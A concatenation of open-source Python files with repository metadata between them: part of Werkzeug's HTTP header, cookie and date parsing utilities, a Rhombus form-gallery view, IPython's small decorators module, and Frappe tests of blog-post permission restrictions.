_etag_re = re.compile(r'([Ww]/)?(?:"(.*?)"|(.*?))(?:\s*,\s*|$)')
_unsafe_header_chars = set('()<>@,;:\"/[]?={} \t')
_quoted_string_re = r'"[^"\\]*(?:\\.[^"\\]*)*"'
_option_header_piece_re = re.compile(r';\s*(%s|[^\s;=]+)\s*(?:=\s*(%s|[^;]+))?\s*' %
(_quoted_string_re, _quoted_string_re))
_entity_headers = frozenset([
'allow', 'content-encoding', 'content-language', 'content-length',
'content-location', 'content-md5', 'content-range', 'content-type',
'expires', 'last-modified'
])
_hop_by_hop_headers = frozenset([
'connection', 'keep-alive', 'proxy-authenticate',
'proxy-authorization', 'te', 'trailer', 'transfer-encoding',
'upgrade'
])
HTTP_STATUS_CODES = {
100: 'Continue',
101: 'Switching Protocols',
102: 'Processing',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
207: 'Multi Status',
226: 'IM Used', # see RFC 3229
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required', # unused
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
418: 'I\'m a teapot', # see RFC 2324
422: 'Unprocessable Entity',
423: 'Locked',
424: 'Failed Dependency',
426: 'Upgrade Required',
428: 'Precondition Required', # see RFC 6585
429: 'Too Many Requests',
431: 'Request Header Fields Too Large',
449: 'Retry With', # proprietary MS extension
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported',
507: 'Insufficient Storage',
510: 'Not Extended'
}
def wsgi_to_bytes(data):
"""coerce wsgi unicode represented bytes to real ones
"""
if isinstance(data, bytes):
return data
return data.encode('latin1') #XXX: utf8 fallback?
def bytes_to_wsgi(data):
assert isinstance(data, bytes), 'data must be bytes'
if isinstance(data, str):
return data
else:
return data.decode('latin1')
def quote_header_value(value, extra_chars='', allow_token=True):
"""Quote a header value if necessary.
.. versionadded:: 0.5
:param value: the value to quote.
:param extra_chars: a list of extra characters to skip quoting.
:param allow_token: if this is enabled token values are returned
unchanged.
"""
if isinstance(value, bytes):
value = bytes_to_wsgi(value)
value = str(value)
if allow_token:
token_chars = _token_chars | set(extra_chars)
if set(value).issubset(token_chars):
return value
return '"%s"' % value.replace('\\', '\\\\').replace('"', '\\"')
def unquote_header_value(value, is_filename=False):
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`).
This does not use the real unquoting but what browsers are actually
using for quoting.
.. versionadded:: 0.5
:param value: the header value to unquote.
"""
if value and value[0] == value[-1] == '"':
# this is not the real unquoting, but fixing this so that the
# RFC is met will result in bugs with internet explorer and
# probably some other browsers as well. IE for example is
# uploading files with "C:\foo\bar.txt" as filename
value = value[1:-1]
# if this is a filename and the starting characters look like
# a UNC path, then just return the value without quotes. Using the
# replace sequence below on a UNC path has the effect of turning
# the leading double slash into a single slash and then
# _fix_ie_filename() doesn't work correctly. See #458.
if not is_filename or value[:2] != '\\\\':
return value.replace('\\\\', '\\').replace('\\"', '"')
return value
def dump_options_header(header, options):
"""The reverse function to :func:`parse_options_header`.
:param header: the header to dump
:param options: a dict of options to append.
"""
segments = []
if header is not None:
segments.append(header)
for key, value in iteritems(options):
if value is None:
segments.append(key)
else:
segments.append('%s=%s' % (key, quote_header_value(value)))
return '; '.join(segments)
def dump_header(iterable, allow_token=True):
"""Dump an HTTP header again. This is the reversal of
:func:`parse_list_header`, :func:`parse_set_header` and
:func:`parse_dict_header`. This also quotes strings that include an
equals sign unless you pass it as dict of key, value pairs.
>>> dump_header({'foo': 'bar baz'})
'foo="bar baz"'
>>> dump_header(('foo', 'bar baz'))
'foo, "bar baz"'
:param iterable: the iterable or dict of values to quote.
:param allow_token: if set to `False` tokens as values are disallowed.
See :func:`quote_header_value` for more details.
"""
if isinstance(iterable, dict):
items = []
for key, value in iteritems(iterable):
if value is None:
items.append(key)
else:
items.append('%s=%s' % (
key,
quote_header_value(value, allow_token=allow_token)
))
else:
items = [quote_header_value(x, allow_token=allow_token)
for x in iterable]
return ', '.join(items)
def parse_list_header(value):
"""Parse lists as described by RFC 2068 Section 2.
In particular, parse comma-separated lists where the elements of
the list may include quoted-strings. A quoted-string could
contain a comma. A non-quoted string could have quotes in the
middle. Quotes are removed automatically after parsing.
It basically works like :func:`parse_set_header` just that items
may appear multiple times and case sensitivity is preserved.
The return value is a standard :class:`list`:
>>> parse_list_header('token, "quoted value"')
['token', 'quoted value']
To create a header from the :class:`list` again, use the
:func:`dump_header` function.
:param value: a string with a list header.
:return: :class:`list`
"""
result = []
for item in _parse_list_header(value):
if item[:1] == item[-1:] == '"':
item = unquote_header_value(item[1:-1])
result.append(item)
return result
def parse_dict_header(value, cls=dict):
"""Parse lists of key, value pairs as described by RFC 2068 Section 2 and
convert them into a python dict (or any other mapping object created from
the type with a dict like interface provided by the `cls` arugment):
>>> d = parse_dict_header('foo="is a fish", bar="as well"')
>>> type(d) is dict
True
>>> sorted(d.items())
[('bar', 'as well'), ('foo', 'is a fish')]
If there is no value for a key it will be `None`:
>>> parse_dict_header('key_without_value')
{'key_without_value': None}
To create a header from the :class:`dict` again, use the
:func:`dump_header` function.
.. versionchanged:: 0.9
Added support for `cls` argument.
:param value: a string with a dict header.
:param cls: callable to use for storage of parsed results.
:return: an instance of `cls`
"""
result = cls()
if not isinstance(value, text_type):
#XXX: validate
value = bytes_to_wsgi(value)
for item in _parse_list_header(value):
if '=' not in item:
result[item] = None
continue
name, value = item.split('=', 1)
if value[:1] == value[-1:] == '"':
value = unquote_header_value(value[1:-1])
result[name] = value
return result
def parse_options_header(value):
"""Parse a ``Content-Type`` like header into a tuple with the content
type and the options:
>>> parse_options_header('text/html; charset=utf8')
('text/html', {'charset': 'utf8'})
This should not be used to parse ``Cache-Control`` like headers that use
a slightly different format. For these headers use the
:func:`parse_dict_header` function.
.. versionadded:: 0.5
:param value: the header to parse.
:return: (str, options)
"""
def _tokenize(string):
for match in _option_header_piece_re.finditer(string):
key, value = match.groups()
key = unquote_header_value(key)
if value is not None:
value = unquote_header_value(value, key == 'filename')
yield key, value
if not value:
return '', {}
parts = _tokenize(';' + value)
name = next(parts)[0]
extra = dict(parts)
return name, extra
def parse_accept_header(value, cls=None):
"""Parses an HTTP Accept-* header. This does not implement a complete
valid algorithm but one that supports at least value and quality
extraction.
Returns a new :class:`Accept` object (basically a list of ``(value, quality)``
tuples sorted by the quality with some additional accessor methods).
The second parameter can be a subclass of :class:`Accept` that is created
with the parsed values and returned.
:param value: the accept header string to be parsed.
:param cls: the wrapper class for the return value (can be
:class:`Accept` or a subclass thereof)
:return: an instance of `cls`.
"""
if cls is None:
cls = Accept
if not value:
return cls(None)
result = []
for match in _accept_re.finditer(value):
quality = match.group(2)
if not quality:
quality = 1
else:
quality = max(min(float(quality), 1), 0)
result.append((match.group(1), quality))
return cls(result)
def parse_cache_control_header(value, on_update=None, cls=None):
"""Parse a cache control header. The RFC differs between response and
request cache control, this method does not. It's your responsibility
to not use the wrong control statements.
.. versionadded:: 0.5
The `cls` was added. If not specified an immutable
:class:`~werkzeug.datastructures.RequestCacheControl` is returned.
:param value: a cache control header to be parsed.
:param on_update: an optional callable that is called every time a value
on the :class:`~werkzeug.datastructures.CacheControl`
object is changed.
:param cls: the class for the returned object. By default
:class:`~werkzeug.datastructures.RequestCacheControl` is used.
:return: a `cls` object.
"""
if cls is None:
cls = RequestCacheControl
if not value:
return cls(None, on_update)
return cls(parse_dict_header(value), on_update)
def parse_set_header(value, on_update=None):
"""Parse a set-like header and return a
:class:`~werkzeug.datastructures.HeaderSet` object:
>>> hs = parse_set_header('token, "quoted value"')
The return value is an object that treats the items case-insensitively
and keeps the order of the items:
>>> 'TOKEN' in hs
True
>>> hs.index('quoted value')
1
>>> hs
HeaderSet(['token', 'quoted value'])
To create a header from the :class:`HeaderSet` again, use the
:func:`dump_header` function.
:param value: a set header to be parsed.
:param on_update: an optional callable that is called every time a
value on the :class:`~werkzeug.datastructures.HeaderSet`
object is changed.
:return: a :class:`~werkzeug.datastructures.HeaderSet`
"""
if not value:
return HeaderSet(None, on_update)
return HeaderSet(parse_list_header(value), on_update)
def parse_authorization_header(value):
"""Parse an HTTP basic/digest authorization header transmitted by the web
browser. The return value is either `None` if the header was invalid or
not given, otherwise an :class:`~werkzeug.datastructures.Authorization`
object.
:param value: the authorization header to parse.
:return: a :class:`~werkzeug.datastructures.Authorization` object or `None`.
"""
if not value:
return
value = wsgi_to_bytes(value)
try:
auth_type, auth_info = value.split(None, 1)
auth_type = auth_type.lower()
except ValueError:
return
if auth_type == b'basic':
try:
username, password = base64.b64decode(auth_info).split(b':', 1)
except Exception as e:
return
return Authorization('basic', {'username': bytes_to_wsgi(username),
'password': bytes_to_wsgi(password)})
elif auth_type == b'digest':
auth_map = parse_dict_header(auth_info)
for key in 'username', 'realm', 'nonce', 'uri', 'response':
if not key in auth_map:
return
if 'qop' in auth_map:
if not auth_map.get('nc') or not auth_map.get('cnonce'):
return
return Authorization('digest', auth_map)
def parse_www_authenticate_header(value, on_update=None):
"""Parse an HTTP WWW-Authenticate header into a
:class:`~werkzeug.datastructures.WWWAuthenticate` object.
:param value: a WWW-Authenticate header to parse.
:param on_update: an optional callable that is called every time a value
on the :class:`~werkzeug.datastructures.WWWAuthenticate`
object is changed.
:return: a :class:`~werkzeug.datastructures.WWWAuthenticate` object.
"""
if not value:
return WWWAuthenticate(on_update=on_update)
try:
auth_type, auth_info = value.split(None, 1)
auth_type = auth_type.lower()
except (ValueError, AttributeError):
return WWWAuthenticate(value.strip().lower(), on_update=on_update)
return WWWAuthenticate(auth_type, parse_dict_header(auth_info),
on_update)
def parse_if_range_header(value):
"""Parses an if-range header which can be an etag or a date. Returns
a :class:`~werkzeug.datastructures.IfRange` object.
.. versionadded:: 0.7
"""
if not value:
return IfRange()
date = parse_date(value)
if date is not None:
return IfRange(date=date)
# drop weakness information
return IfRange(unquote_etag(value)[0])
def parse_range_header(value, make_inclusive=True):
"""Parses a range header into a :class:`~werkzeug.datastructures.Range`
object. If the header is missing or malformed `None` is returned.
`ranges` is a list of ``(start, stop)`` tuples where the ranges are
non-inclusive.
.. versionadded:: 0.7
"""
if not value or '=' not in value:
return None
ranges = []
last_end = 0
units, rng = value.split('=', 1)
units = units.strip().lower()
for item in rng.split(','):
item = item.strip()
if '-' not in item:
return None
if item.startswith('-'):
if last_end < 0:
return None
begin = int(item)
end = None
last_end = -1
elif '-' in item:
begin, end = item.split('-', 1)
begin = int(begin)
if begin < last_end or last_end < 0:
return None
if end:
end = int(end) + 1
if begin >= end:
return None
else:
end = None
last_end = end
ranges.append((begin, end))
return Range(units, ranges)
def parse_content_range_header(value, on_update=None):
"""Parses a range header into a
:class:`~werkzeug.datastructures.ContentRange` object or `None` if
parsing is not possible.
.. versionadded:: 0.7
:param value: a content range header to be parsed.
:param on_update: an optional callable that is called every time a value
on the :class:`~werkzeug.datastructures.ContentRange`
object is changed.
"""
if value is None:
return None
try:
units, rangedef = (value or '').strip().split(None, 1)
except ValueError:
return None
if '/' not in rangedef:
return None
rng, length = rangedef.split('/', 1)
if length == '*':
length = None
elif length.isdigit():
length = int(length)
else:
return None
if rng == '*':
return ContentRange(units, None, None, length, on_update=on_update)
elif '-' not in rng:
return None
start, stop = rng.split('-', 1)
try:
start = int(start)
stop = int(stop) + 1
except ValueError:
return None
if is_byte_range_valid(start, stop, length):
return ContentRange(units, start, stop, length, on_update=on_update)
def quote_etag(etag, weak=False):
"""Quote an etag.
:param etag: the etag to quote.
:param weak: set to `True` to tag it "weak".
"""
if '"' in etag:
raise ValueError('invalid etag')
etag = '"%s"' % etag
if weak:
etag = 'w/' + etag
return etag
def unquote_etag(etag):
"""Unquote a single etag:
>>> unquote_etag('w/"bar"')
('bar', True)
>>> unquote_etag('"bar"')
('bar', False)
:param etag: the etag identifier to unquote.
:return: a ``(etag, weak)`` tuple.
"""
if not etag:
return None, None
etag = etag.strip()
weak = False
if etag[:2] in ('w/', 'W/'):
weak = True
etag = etag[2:]
if etag[:1] == etag[-1:] == '"':
etag = etag[1:-1]
return etag, weak
def parse_etags(value):
"""Parse an etag header.
:param value: the tag header to parse
:return: an :class:`~werkzeug.datastructures.ETags` object.
"""
if not value:
return ETags()
strong = []
weak = []
end = len(value)
pos = 0
while pos < end:
match = _etag_re.match(value, pos)
if match is None:
break
is_weak, quoted, raw = match.groups()
if raw == '*':
return ETags(star_tag=True)
elif quoted:
raw = quoted
if is_weak:
weak.append(raw)
else:
strong.append(raw)
pos = match.end()
return ETags(strong, weak)
def generate_etag(data):
"""Generate an etag for some data."""
return md5(data).hexdigest()
def parse_date(value):
"""Parse one of the following date formats into a datetime object:
.. sourcecode:: text
Sun, 06 Nov 1994 08:49:37 GMT ; RFC 822, updated by RFC 1123
Sunday, 06-Nov-94 08:49:37 GMT ; RFC 850, obsoleted by RFC 1036
Sun Nov 6 08:49:37 1994 ; ANSI C's asctime() format
If parsing fails the return value is `None`.
:param value: a string with a supported date format.
:return: a :class:`datetime.datetime` object.
"""
if value:
t = parsedate_tz(value.strip())
if t is not None:
try:
year = t[0]
# unfortunately that function does not tell us if two digit
# years were part of the string, or if they were prefixed
# with two zeroes. So what we do is to assume that 69-99
# refer to 1900, and everything below to 2000
if year >= 0 and year <= 68:
year += 2000
elif year >= 69 and year <= 99:
year += 1900
return datetime(*((year,) + t[1:7])) - \
timedelta(seconds=t[-1] or 0)
except (ValueError, OverflowError):
return None
def _dump_date(d, delim):
"""Used for `http_date` and `cookie_date`."""
if d is None:
d = gmtime()
elif isinstance(d, datetime):
d = d.utctimetuple()
elif isinstance(d, (integer_types, float)):
d = gmtime(d)
return '%s, %02d%s%s%s%s %02d:%02d:%02d GMT' % (
('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun')[d.tm_wday],
d.tm_mday, delim,
('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep',
'Oct', 'Nov', 'Dec')[d.tm_mon - 1],
delim, str(d.tm_year), d.tm_hour, d.tm_min, d.tm_sec
)
def cookie_date(expires=None):
"""Formats the time to ensure compatibility with Netscape's cookie
standard.
Accepts a floating point number expressed in seconds since the epoch in, a
datetime object or a timetuple. All times in UTC. The :func:`parse_date`
function can be used to parse such a date.
Outputs a string in the format ``Wdy, DD-Mon-YYYY HH:MM:SS GMT``.
:param expires: If provided that date is used, otherwise the current.
"""
return _dump_date(expires, '-')
def http_date(timestamp=None):
"""Formats the time to match the RFC1123 date format.
Accepts a floating point number expressed in seconds since the epoch in, a
datetime object or a timetuple. All times in UTC. The :func:`parse_date`
function can be used to parse such a date.
Outputs a string in the format ``Wdy, DD Mon YYYY HH:MM:SS GMT``.
:param timestamp: If provided that date is used, otherwise the current.
"""
return _dump_date(timestamp, ' ')
def is_resource_modified(environ, etag=None, data=None, last_modified=None):
"""Convenience method for conditional requests.
:param environ: the WSGI environment of the request to be checked.
:param etag: the etag for the response for comparison.
:param data: or alternatively the data of the response to automatically
generate an etag using :func:`generate_etag`.
:param last_modified: an optional date of the last modification.
:return: `True` if the resource was modified, otherwise `False`.
"""
if etag is None and data is not None:
etag = generate_etag(data)
elif data is not None:
raise TypeError('both data and etag given')
if environ['REQUEST_METHOD'] not in ('GET', 'HEAD'):
return False
unmodified = False
if isinstance(last_modified, string_types):
last_modified = parse_date(last_modified)
# ensure that microsecond is zero because the HTTP spec does not transmit
# that either and we might have some false positives. See issue #39
if last_modified is not None:
last_modified = last_modified.replace(microsecond=0)
modified_since = parse_date(environ.get('HTTP_IF_MODIFIED_SINCE'))
if modified_since and last_modified and last_modified <= modified_since:
unmodified = True
if etag:
if_none_match = parse_etags(environ.get('HTTP_IF_NONE_MATCH'))
if if_none_match:
unmodified = if_none_match.contains_raw(etag)
return not unmodified
def remove_entity_headers(headers, allowed=('expires', 'content-location')):
"""Remove all entity headers from a list or :class:`Headers` object. This
operation works in-place. `Expires` and `Content-Location` headers are
by default not removed. The reason for this is :rfc:`2616` section
10.3.5 which specifies some entity headers that should be sent.
.. versionchanged:: 0.5
added `allowed` parameter.
:param headers: a list or :class:`Headers` object.
:param allowed: a list of headers that should still be allowed even though
they are entity headers.
"""
allowed = set(x.lower() for x in allowed)
headers[:] = [(key, value) for key, value in headers if
not is_entity_header(key) or key.lower() in allowed]
def remove_hop_by_hop_headers(headers):
"""Remove all HTTP/1.1 "Hop-by-Hop" headers from a list or
:class:`Headers` object. This operation works in-place.
.. versionadded:: 0.5
:param headers: a list or :class:`Headers` object.
"""
headers[:] = [(key, value) for key, value in headers if
not is_hop_by_hop_header(key)]
def is_entity_header(header):
"""Check if a header is an entity header.
.. versionadded:: 0.5
:param header: the header to test.
:return: `True` if it's an entity header, `False` otherwise.
"""
return header.lower() in _entity_headers
def is_hop_by_hop_header(header):
"""Check if a header is an HTTP/1.1 "Hop-by-Hop" header.
.. versionadded:: 0.5
:param header: the header to test.
:return: `True` if it's an entity header, `False` otherwise.
"""
return header.lower() in _hop_by_hop_headers
def parse_cookie(header, charset='utf-8', errors='replace', cls=None):
"""Parse a cookie. Either from a string or WSGI environ.
Per default encoding errors are ignored. If you want a different behavior
you can set `errors` to ``'replace'`` or ``'strict'``. In strict mode a
:exc:`HTTPUnicodeError` is raised.
.. versionchanged:: 0.5
This function now returns a :class:`TypeConversionDict` instead of a
regular dict. The `cls` parameter was added.
:param header: the header to be used to parse the cookie. Alternatively
this can be a WSGI environment.
:param charset: the charset for the cookie values.
:param errors: the error behavior for the charset decoding.
:param cls: an optional dict class to use. If this is not specified
or `None` the default :class:`TypeConversionDict` is
used.
"""
if isinstance(header, dict):
header = header.get('HTTP_COOKIE', '')
elif header is None:
header = ''
# If the value is an unicode string it's mangled through latin1. This
# is done because on PEP 3333 on Python 3 all headers are assumed latin1
# which however is incorrect for cookies, which are sent in page encoding.
# As a result we
if isinstance(header, text_type):
header = header.encode('latin1', 'replace')
if cls is None:
cls = TypeConversionDict
def _parse_pairs():
for key, val in _cookie_parse_impl(header):
key = to_unicode(key, charset, errors, allow_none_charset=True)
val = to_unicode(val, charset, errors, allow_none_charset=True)
yield try_coerce_native(key), val
return cls(_parse_pairs())
def dump_cookie(key, value='', max_age=None, expires=None, path='/',
domain=None, secure=False, httponly=False,
charset='utf-8', sync_expires=True):
"""Creates a new Set-Cookie header without the ``Set-Cookie`` prefix
The parameters are the same as in the cookie Morsel object in the
Python standard library but it accepts unicode data, too.
On Python 3 the return value of this function will be a unicode
string, on Python 2 it will be a native string. In both cases the
return value is usually restricted to ascii as the vast majority of
values are properly escaped, but that is no guarantee. If a unicode
string is returned it's tunneled through latin1 as required by
PEP 3333.
The return value is not ASCII safe if the key contains unicode
characters. This is technically against the specification but
happens in the wild. It's strongly recommended to not use
non-ASCII values for the keys.
:param max_age: should be a number of seconds, or `None` (default) if
the cookie should last only as long as the client's
browser session. Additionally `timedelta` objects
are accepted, too.
:param expires: should be a `datetime` object or unix timestamp.
:param path: limits the cookie to a given path, per default it will
span the whole domain.
:param domain: Use this if you want to set a cross-domain cookie. For
example, ``domain=".example.com"`` will set a cookie
that is readable by the domain ``www.example.com``,
``foo.example.com`` etc. Otherwise, a cookie will only
be readable by the domain that set it.
:param secure: The cookie will only be available via HTTPS
:param httponly: disallow JavaScript to access the cookie. This is an
extension to the cookie standard and probably not
supported by all browsers.
:param charset: the encoding for unicode values.
:param sync_expires: automatically set expires if max_age is defined
but expires not.
"""
key = to_bytes(key, charset)
value = to_bytes(value, charset)
if path is not None:
path = iri_to_uri(path, charset)
domain = _make_cookie_domain(domain)
if isinstance(max_age, timedelta):
max_age = (max_age.days * 60 * 60 * 24) + max_age.seconds
if expires is not None:
if not isinstance(expires, string_types):
expires = cookie_date(expires)
elif max_age is not None and sync_expires:
expires = to_bytes(cookie_date(time() + max_age))
buf = [key + b'=' + _cookie_quote(value)]
# XXX: In theory all of these parameters that are not marked with `None`
# should be quoted. Because stdlib did not quote it before I did not
# want to introduce quoting there now.
for k, v, q in ((b'Domain', domain, True),
(b'Expires', expires, False,),
(b'Max-Age', max_age, False),
(b'Secure', secure, None),
(b'HttpOnly', httponly, None),
(b'Path', path, False)):
if q is None:
if v:
buf.append(k)
continue
if v is None:
continue
tmp = bytearray(k)
if not isinstance(v, (bytes, bytearray)):
v = to_bytes(text_type(v), charset)
if q:
v = _cookie_quote(v)
tmp += b'=' + v
buf.append(bytes(tmp))
# The return value will be an incorrectly encoded latin1 header on
# Python 3 for consistency with the headers object and a bytestring
# on Python 2 because that's how the API makes more sense.
rv = b'; '.join(buf)
if not PY2:
rv = rv.decode('latin1')
return rv
def is_byte_range_valid(start, stop, length):
"""Checks if a given byte content range is valid for the given length.
.. versionadded:: 0.7
"""
if (start is None) != (stop is None):
return False
elif start is None:
return length is None or length >= 0
elif length is None:
return 0 <= start < stop
elif start >= stop:
return False
return 0 <= start < length
# circular dependency fun
from werkzeug.datastructures import Accept, HeaderSet, ETags, Authorization, \
WWWAuthenticate, TypeConversionDict, IfRange, Range, ContentRange, \
RequestCacheControl
# DEPRECATED
# backwards compatible imports
from werkzeug.datastructures import MIMEAccept, CharsetAccept, \
LanguageAccept, Headers
from werkzeug.urls import iri_to_uri
|
apache-2.0
|
trmznt/rhombus
|
rhombus/views/gallery.py
|
1
|
2066
|
from rhombus.views import *
@roles( PUBLIC )
def index(request):
""" input tags gallery """
static = False
html = div( div(h3('Input Gallery')))
eform = form( name='rhombus/gallery', method=POST,
action='')
eform.add(
fieldset(
input_hidden(name='rhombus-gallery_id', value='00'),
input_text('rhombus-gallery_text', 'Text Field', value='Text field value'),
input_text('rhombus-gallery_static', 'Static Text Field', value='Text field static',
static=True),
input_textarea('rhombus-gallery_textarea', 'Text Area', value='A text in text area'),
input_select('rhombus-gallery_select', 'Select', value=2,
options = [ (1, 'Opt1'), (2, 'Opt2'), (3, 'Opt3') ]),
input_select('rhombus-gallery_select-multi', 'Select (Multiple)', value=[2,3],
options = [ (1, 'Opt1'), (2, 'Opt2'), (3, 'Opt3') ], multiple=True),
input_select('rhombus-gallery_select2', 'Select2 (Multiple)', value=[2,4],
options = [ (1, 'Opt1'), (2, 'Opt2'), (3, 'Opt3'), (4, 'Opt4'), (5, 'Opt5') ], multiple=True),
input_select('rhombus-gallery_select2-ajax', 'Select2 (AJAX)'),
checkboxes('rhombus-gallery_checkboxes', 'Check Boxes',
boxes = [ ('1', 'Box 1', True), ('2', 'Box 2', False), ('3', 'Box 3', True)]),
submit_bar(),
)
)
html.add( div(eform) )
code = '''
$('#rhombus-gallery_select2').select2();
$('#rhombus-gallery_select2-ajax').select2({
placeholder: 'Select from AJAX',
minimumInputLength: 3,
ajax: {
url: "%s",
dataType: 'json',
data: function(params) { return { q: params.term, g: "@ROLES" }; },
processResults: function(data, params) { return { results: data }; }
},
});
''' % request.route_url('rhombus.ek-lookup')
return render_to_response('rhombus:templates/generics/page.mako',
{ 'content': str(html), 'code': code },
request = request )
|
lgpl-3.0
|
lifeinoppo/littlefishlet-scode
|
RES/REF/python_sourcecode/ipython-master/IPython/utils/decorators.py
|
36
|
2071
|
# encoding: utf-8
"""Decorators that don't go anywhere else.
This module contains misc. decorators that don't really go with another module
in :mod:`IPython.utils`. Beore putting something here please see if it should
go into another topical module in :mod:`IPython.utils`.
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
def flag_calls(func):
"""Wrap a function to detect and flag when it gets called.
This is a decorator which takes a function and wraps it in a function with
a 'called' attribute. wrapper.called is initialized to False.
The wrapper.called attribute is set to False right before each call to the
wrapped function, so if the call fails it remains False. After the call
completes, wrapper.called is set to True and the output is returned.
Testing for truth in wrapper.called allows you to determine if a call to
func() was attempted and succeeded."""
# don't wrap twice
if hasattr(func, 'called'):
return func
def wrapper(*args,**kw):
wrapper.called = False
out = func(*args,**kw)
wrapper.called = True
return out
wrapper.called = False
wrapper.__doc__ = func.__doc__
return wrapper
def undoc(func):
"""Mark a function or class as undocumented.
This is found by inspecting the AST, so for now it must be used directly
as @undoc, not as e.g. @decorators.undoc
"""
return func
|
gpl-2.0
|
cadencewatches/frappe
|
frappe/website/doctype/blog_post/test_blog_post.py
|
1
|
5111
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
"""Use blog post test to test permission restriction logic"""
import frappe
import frappe.defaults
import unittest
from frappe.core.page.user_properties.user_properties import add, remove, get_properties, clear_restrictions
test_records = frappe.get_test_records('Blog Post')
test_dependencies = ["User"]
class TestBlogPost(unittest.TestCase):
def setUp(self):
frappe.db.sql("""update tabDocPerm set `restricted`=0 where parent='Blog Post'
and ifnull(permlevel,0)=0""")
frappe.db.sql("""update `tabBlog Post` set owner='test2@example.com'
where name='_test-blog-post'""")
frappe.clear_cache(doctype="Blog Post")
user = frappe.get_doc("User", "test1@example.com")
user.add_roles("Website Manager")
user = frappe.get_doc("User", "test2@example.com")
user.add_roles("Blogger")
frappe.set_user("test1@example.com")
def tearDown(self):
frappe.set_user("Administrator")
clear_restrictions("Blog Category")
clear_restrictions("Blog Post")
def test_basic_permission(self):
post = frappe.get_doc("Blog Post", "_test-blog-post")
self.assertTrue(post.has_permission("read"))
def test_restriction_in_doc(self):
frappe.defaults.add_default("Blog Category", "_Test Blog Category 1", "test1@example.com",
"Restriction")
post = frappe.get_doc("Blog Post", "_test-blog-post")
self.assertFalse(post.has_permission("read"))
post1 = frappe.get_doc("Blog Post", "_test-blog-post-1")
self.assertTrue(post1.has_permission("read"))
def test_restriction_in_report(self):
frappe.defaults.add_default("Blog Category", "_Test Blog Category 1", "test1@example.com",
"Restriction")
names = [d.name for d in frappe.get_list("Blog Post", fields=["name", "blog_category"])]
self.assertTrue("_test-blog-post-1" in names)
self.assertFalse("_test-blog-post" in names)
def test_default_values(self):
frappe.defaults.add_default("Blog Category", "_Test Blog Category 1", "test1@example.com",
"Restriction")
doc = frappe.new_doc("Blog Post")
self.assertEquals(doc.get("blog_category"), "_Test Blog Category 1")
def add_restricted_on_blogger(self):
frappe.db.sql("""update tabDocPerm set `restricted`=1 where parent='Blog Post' and role='Blogger'
and ifnull(permlevel,0)=0""")
frappe.clear_cache(doctype="Blog Post")
def test_owner_match_doc(self):
self.add_restricted_on_blogger()
frappe.set_user("test2@example.com")
post = frappe.get_doc("Blog Post", "_test-blog-post")
self.assertTrue(post.has_permission("read"))
post1 = frappe.get_doc("Blog Post", "_test-blog-post-1")
self.assertFalse(post1.has_permission("read"))
def test_owner_match_report(self):
frappe.db.sql("""update tabDocPerm set `restricted`=1 where parent='Blog Post'
and ifnull(permlevel,0)=0""")
frappe.clear_cache(doctype="Blog Post")
frappe.set_user("test2@example.com")
names = [d.name for d in frappe.get_list("Blog Post", fields=["name", "owner"])]
self.assertTrue("_test-blog-post" in names)
self.assertFalse("_test-blog-post-1" in names)
def add_restriction_to_user2(self):
frappe.set_user("test1@example.com")
add("test2@example.com", "Blog Post", "_test-blog-post")
def test_add_restriction(self):
# restrictor can add restriction
self.add_restriction_to_user2()
def test_not_allowed_to_restrict(self):
frappe.set_user("test2@example.com")
# this user can't add restriction
self.assertRaises(frappe.PermissionError, add,
"test2@example.com", "Blog Post", "_test-blog-post")
def test_not_allowed_on_restrict(self):
self.add_restriction_to_user2()
frappe.set_user("test2@example.com")
# user can only access restricted blog post
doc = frappe.get_doc("Blog Post", "_test-blog-post")
self.assertTrue(doc.has_permission("read"))
# and not this one
doc = frappe.get_doc("Blog Post", "_test-blog-post-1")
self.assertFalse(doc.has_permission("read"))
def test_not_allowed_to_remove_self(self):
self.add_restriction_to_user2()
defname = get_properties("test2@example.com", "Blog Post", "_test-blog-post")[0].name
frappe.set_user("test2@example.com")
# user cannot remove their own restriction
self.assertRaises(frappe.PermissionError, remove,
"test2@example.com", defname, "Blog Post", "_test-blog-post")
def test_allow_in_restriction(self):
self.add_restricted_on_blogger()
frappe.set_user("test2@example.com")
doc = frappe.get_doc("Blog Post", "_test-blog-post-1")
self.assertFalse(doc.has_permission("read"))
frappe.set_user("test1@example.com")
add("test2@example.com", "Blog Post", "_test-blog-post-1")
frappe.set_user("test2@example.com")
doc = frappe.get_doc("Blog Post", "_test-blog-post-1")
self.assertTrue(doc.has_permission("read"))
def test_set_only_once(self):
blog_post = frappe.get_meta("Blog Post")
blog_post.get_field("title").set_only_once = 1
doc = frappe.get_doc("Blog Post", "_test-blog-post-1")
doc.title = "New"
self.assertRaises(frappe.CannotChangeConstantError, doc.save)
blog_post.get_field("title").set_only_once = 0
|
mit
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.